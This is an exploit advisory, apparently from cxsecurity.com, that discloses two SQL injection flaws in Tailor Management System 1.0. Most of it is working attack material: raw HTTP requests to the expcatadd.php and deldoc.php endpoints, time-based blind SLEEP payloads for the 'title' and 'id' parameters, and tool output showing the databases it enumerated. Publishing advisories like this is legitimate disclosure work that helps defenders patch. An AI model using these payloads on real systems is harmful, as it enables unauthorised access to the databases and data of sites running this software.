Tailor Management System 1.0 SQL Injection

2020.08.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Tailor Management System 1.0 Multiple SQL Injection Vulnerabilities # Google Dork: N/A # Date: 06.08.2020 # Exploit Author: Mucahit Karadag # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html # Version: 1.0 # Tested on: Ubuntu Server 14.04.6 LTS # CVE : N/A ### # Software Description: # Tailor Management Software. This Project was created in PHP MySQL using JavaScript, Ajax, # Bootstrap, HTML, CSS. The software has mainly covered information of the customers. This # tailor software can Manage booking, worker wages, suppliers and customers, and to measure #styles and payment history using web application. # # Vulnerabilitiy Description: # Tailor Management System 1.0 web application is vulnerable to # 2 different SQL injection vulnerabilities in multiple endpoints. ### ## ## [SQL Injection Identified on "title" Parameter] ## POST /tailor/expcatadd.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 10 Origin: http://TARGET DNT: 1 Connection: close Referer: http://TARGET/tailor/expcatadd.php Cookie: PHPSESSID=f6nbmpss36vdiis4ldb2nl11h6 Upgrade-Insecure-Requests: 1 title=test # "title" parameter is vulnerable to SQL injection on HTTP POST rquest to /tailor/expcatadd.php endpoint. Here is PoC: --- Parameter: title (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=test' AND (SELECT 1577 FROM (SELECT(SLEEP(5)))zVYP) AND 'UKwv'='UKwv --- [20:34:49] [INFO] fetching database names [20:34:49] [INFO] fetching number of databases [20:34:49] [INFO] resumed: 5 [20:34:49] [INFO] resumed: information_schema [20:34:49] [INFO] resumed: mysql [20:34:49] [INFO] resumed: performance_schema [20:34:49] [INFO] resumed: phpmyadmin [20:34:49] [INFO] resumed: tailor available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] tailor ## ## [SQL Injection Identified on "id" Parameter] ## GET /tailor/deldoc.php?id=123123123 HTTP/1.1 Host: 12.0.0.163 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=cfpvj5ehmrgdpl2d1gh5rc3p90 Upgrade-Insecure-Requests: 1 # "id" parameter is vulnerable to SQL injection on HTTP GET rquest to /tailor/deldoc.php?id= endpoint. Here is PoC: --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=123123123' AND (SELECT 8657 FROM (SELECT(SLEEP(5)))bntA) AND 'ovvs'='ovvs ---


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top